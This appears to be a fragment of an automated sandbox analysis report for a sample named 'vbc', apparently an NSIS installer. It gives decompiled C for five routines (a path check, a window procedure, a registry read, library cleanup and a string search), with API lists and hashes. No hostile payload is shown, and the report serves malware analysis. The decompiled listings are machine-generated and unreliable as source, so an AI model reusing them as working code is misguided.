                                                • Opcode Fuzzy Hash: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                                • Instruction Fuzzy Hash: A9F08270702A20AFC2316F50FE4998B7F68FB44B56741447AF446B15ACCB380DA2CB9D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 53%
                                                			E00405F14(void* __eflags, intOrPtr _a4) {
                                                				int _t11;
                                                				signed char* _t12;
                                                				intOrPtr _t18;
                                                				intOrPtr* _t21;
                                                				signed int _t23;
                                                
                                                				E0040653D(0x42fa70, _a4);
                                                				_t21 = E00405EB7(0x42fa70);
                                                				if(_t21 != 0) {
                                                					E004067C4(_t21);
                                                					if(( *0x434f18 & 0x00000080) == 0) {
                                                						L5:
                                                						_t23 = _t21 - 0x42fa70 >> 1;
                                                						while(1) {
                                                							_t11 = lstrlenW(0x42fa70);
                                                							_push(0x42fa70);
                                                							if(_t11 <= _t23) {
                                                								break;
                                                							}
                                                							_t12 = E00406873();
                                                							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                								E00405E58(0x42fa70);
                                                								continue;
                                                							} else {
                                                								goto L1;
                                                							}
                                                						}
                                                						E00405E0C();
                                                						return 0 | GetFileAttributesW(??) != 0xffffffff;
                                                					}
                                                					_t18 =  *_t21;
                                                					if(_t18 == 0 || _t18 == 0x5c) {
                                                						goto L1;
                                                					} else {
                                                						goto L5;
                                                					}
                                                				}
                                                				L1:
                                                				return 0;
                                                			}








                                                0x00405f20
                                                0x00405f2b
                                                0x00405f2f
                                                0x00405f36
                                                0x00405f42
                                                0x00405f52
                                                0x00405f54
                                                0x00405f6c
                                                0x00405f6d
                                                0x00405f74
                                                0x00405f75
                                                0x00000000
                                                0x00000000
                                                0x00405f58
                                                0x00405f5f
                                                0x00405f67
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405f5f
                                                0x00405f77
                                                0x00000000
                                                0x00405f8b
                                                0x00405f44
                                                0x00405f4a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405f4a
                                                0x00405f31
                                                0x00000000

                                                APIs
                                                  • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                                  • Part of subcall function 00405EB7: CharNextW.USER32(?), ref: 00405EC5
                                                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                                • lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70,74EDD4C4,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,74EDD4C4,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F6D
                                                • GetFileAttributesW.KERNEL32(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70,74EDD4C4,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,74EDD4C4,C:\Users\user\AppData\Local\Temp\), ref: 00405F7D
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F14
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 3248276644-4017390910
                                                • Opcode ID: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                                • Instruction ID: e20fb510edeaf32ba19235dad054e15b0ffac27cf679254cac4fdbc394554759
                                                • Opcode Fuzzy Hash: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                                • Instruction Fuzzy Hash: E3F0F426119D6226DB22333A5C05EAF0554CE9276475A023BF895B12C5DB3C8A43D8AE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 89%
                                                			E00405513(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                				int _t15;
                                                				long _t16;
                                                
                                                				_t15 = _a8;
                                                				if(_t15 != 0x102) {
                                                					if(_t15 != 0x200) {
                                                						_t16 = _a16;
                                                						L7:
                                                						if(_t15 == 0x419 &&  *0x42d254 != _t16) {
                                                							_push(_t16);
                                                							_push(6);
                                                							 *0x42d254 = _t16;
                                                							E00404ED4();
                                                						}
                                                						L11:
                                                						return CallWindowProcW( *0x42d25c, _a4, _t15, _a12, _t16);
                                                					}
                                                					if(IsWindowVisible(_a4) == 0) {
                                                						L10:
                                                						_t16 = _a16;
                                                						goto L11;
                                                					}
                                                					_t16 = E00404E54(_a4, 1);
                                                					_t15 = 0x419;
                                                					goto L7;
                                                				}
                                                				if(_a12 != 0x20) {
                                                					goto L10;
                                                				}
                                                				E004044E5(0x413);
                                                				return 0;
                                                			}





                                                0x00405517
                                                0x00405521
                                                0x0040553d
                                                0x0040555f
                                                0x00405562
                                                0x00405568
                                                0x00405572
                                                0x00405573
                                                0x00405575
                                                0x0040557b
                                                0x0040557b
                                                0x00405585
                                                0x00000000
                                                0x00405593
                                                0x0040554a
                                                0x00405582
                                                0x00405582
                                                0x00000000
                                                0x00405582
                                                0x00405556
                                                0x00405558
                                                0x00000000
                                                0x00405558
                                                0x00405527
                                                0x00000000
                                                0x00000000
                                                0x0040552e
                                                0x00000000

                                                APIs
                                                • IsWindowVisible.USER32(?), ref: 00405542
                                                • CallWindowProcW.USER32(?,?,?,?), ref: 00405593
                                                  • Part of subcall function 004044E5: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Window$CallMessageProcSendVisible
                                                • String ID:
                                                • API String ID: 3748168415-3916222277
                                                • Opcode ID: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                                • Instruction ID: 904a7c61355239921aaa7855b64c86422fca6e8886f64d9e6fcbc6a993ea73ec
                                                • Opcode Fuzzy Hash: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                                • Instruction Fuzzy Hash: F3017CB1100608BFDF209F11DD80AAB3B27EB84754F50453AFA01762D5D77A8E92DA69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 90%
                                                			E0040640B(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                                                				int _v8;
                                                				long _t21;
                                                				long _t24;
                                                				char* _t30;
                                                
                                                				asm("sbb eax, eax");
                                                				_v8 = 0x800;
                                                				_t21 = E004063AA(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                                                				_t30 = _a16;
                                                				if(_t21 != 0) {
                                                					L4:
                                                					 *_t30 =  *_t30 & 0x00000000;
                                                				} else {
                                                					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                                                					_t21 = RegCloseKey(_a20);
                                                					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                                                					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                                						goto L4;
                                                					}
                                                				}
                                                				return _t21;
                                                			}







                                                0x00406419
                                                0x0040641b
                                                0x00406433
                                                0x00406438
                                                0x0040643d
                                                0x0040647b
                                                0x0040647b
                                                0x0040643f
                                                0x00406451
                                                0x0040645c
                                                0x00406462
                                                0x0040646d
                                                0x00000000
                                                0x00000000
                                                0x0040646d
                                                0x00406481

                                                APIs
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800), ref: 00406451
                                                • RegCloseKey.ADVAPI32(?), ref: 0040645C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CloseQueryValue
                                                • String ID: Call
                                                • API String ID: 3356406503-1824292864
                                                • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                • Instruction ID: a8d415a3dc4e4479eaaa65942f717852bb8bd3539c12dad3b2e52d491ce509ba
                                                • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                • Instruction Fuzzy Hash: FB017C72510209AADF21CF51CC09EDB3BB8FB54364F01803AFD5AA6190D738D968DBA8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00403B57() {
                                                				void* _t2;
                                                				void* _t3;
                                                				void* _t6;
                                                				void* _t8;
                                                
                                                				_t8 =  *0x42b22c;
                                                				_t3 = E00403B3C(_t2, 0);
                                                				if(_t8 != 0) {
                                                					do {
                                                						_t6 = _t8;
                                                						_t8 =  *_t8;
                                                						FreeLibrary( *(_t6 + 8));
                                                						_t3 = GlobalFree(_t6);
                                                					} while (_t8 != 0);
                                                				}
                                                				 *0x42b22c =  *0x42b22c & 0x00000000;
                                                				return _t3;
                                                			}







                                                0x00403b58
                                                0x00403b60
                                                0x00403b67
                                                0x00403b6a
                                                0x00403b6a
                                                0x00403b6c
                                                0x00403b71
                                                0x00403b78
                                                0x00403b7e
                                                0x00403b82
                                                0x00403b83
                                                0x00403b8b

                                                APIs
                                                • FreeLibrary.KERNEL32(?,74EDD4C4,00000000,C:\Users\user\AppData\Local\Temp\,00403B2F,00403A5E,?), ref: 00403B71
                                                • GlobalFree.KERNEL32(?), ref: 00403B78
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B57
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Free$GlobalLibrary
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 1100898210-4017390910
                                                • Opcode ID: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                • Instruction ID: 19c5699a9bb8b3376c06320bd1355d3f7d45777e2bc9a3354ca833756e7661a4
                                                • Opcode Fuzzy Hash: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                • Instruction Fuzzy Hash: 40E0EC3290212097C7615F55FE08B6E7B78AF49B26F05056AE884BB2628B746D428BDC
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00405F92(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                				int _v8;
                                                				int _t12;
                                                				int _t14;
                                                				int _t15;
                                                				CHAR* _t17;
                                                				CHAR* _t27;
                                                
                                                				_t12 = lstrlenA(_a8);
                                                				_t27 = _a4;
                                                				_v8 = _t12;
                                                				while(lstrlenA(_t27) >= _v8) {
                                                					_t14 = _v8;
                                                					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                					_t15 = lstrcmpiA(_t27, _a8);
                                                					_t27[_v8] =  *(_t14 + _t27);
                                                					if(_t15 == 0) {
                                                						_t17 = _t27;
                                                					} else {
                                                						_t27 = CharNextA(_t27);
                                                						continue;
                                                					}
                                                					L5:
                                                					return _t17;
                                                				}
                                                				_t17 = 0;
                                                				goto L5;
                                                			}









                                                0x00405fa2
                                                0x00405fa4
                                                0x00405fa7
                                                0x00405fd3
                                                0x00405fac
                                                0x00405fb5
                                                0x00405fba
                                                0x00405fc5
                                                0x00405fc8
                                                0x00405fe4
                                                0x00405fca
                                                0x00405fd1
                                                0x00000000
                                                0x00405fd1
                                                0x00405fdd
                                                0x00405fe1
                                                0x00405fe1
                                                0x00405fdb
                                                0x00000000

                                                APIs
                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                                • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBA
                                                • CharNextA.USER32(00000000), ref: 00405FCB
                                                • lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: lstrlen$CharNextlstrcmpi
                                                • String ID:
                                                • API String ID: 190613189-0
                                                • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                • Instruction ID: bd09551308ad338638525116890fdadd4ab1f465f5503068af61de479685a4e4
                                                • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                • Instruction Fuzzy Hash: 34F0C231604418FFC7029BA5CD0099EBBA8EF06250B2140AAF840FB210D678DE019BA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%